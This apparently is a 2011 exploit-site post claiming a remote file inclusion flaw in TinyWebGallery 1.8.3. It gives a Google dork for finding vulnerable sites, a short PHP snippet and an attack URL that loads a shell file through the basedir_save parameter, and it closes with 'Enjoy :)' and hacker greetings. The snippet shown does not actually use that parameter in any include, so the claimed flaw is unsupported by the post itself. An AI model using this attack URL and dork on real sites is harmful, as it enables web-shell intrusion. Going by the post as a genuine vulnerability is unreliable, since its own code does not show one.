TinyWebGallery v 1.8.3 Remote File Include Vulnerbility

2011-01-26 10:15:24

# Exploit Title: TinyWebGallery v 1.8.3 Remote file include vulnerbility
# Google Dork: Photo Gallery powered by TinyWebGallery 1.8.3
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.tinywebgallery.com
# Version: v 1.8.3
# Tested on: ubuntu + win7
# Email : [email protected]
#######################################################
Fichier : i_basic.inc.php
http://localhost/[path]/i_frames/i_basic.inc.php

Code :
<?php
include '../config.php';

$basedir_save = $basedir;
?>

Exploit :
http://127.0.0.1/[path]/i_frames/i_basic.inc.php?basedir_save= [ Shell.txt ]

Enjoy :)

##########################################################
#
Greetz To : #
RoMaNcYxHaCkEr - saudi0hacker - aB0-3tH4b T3rR0r - TakEr #
#
##########################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.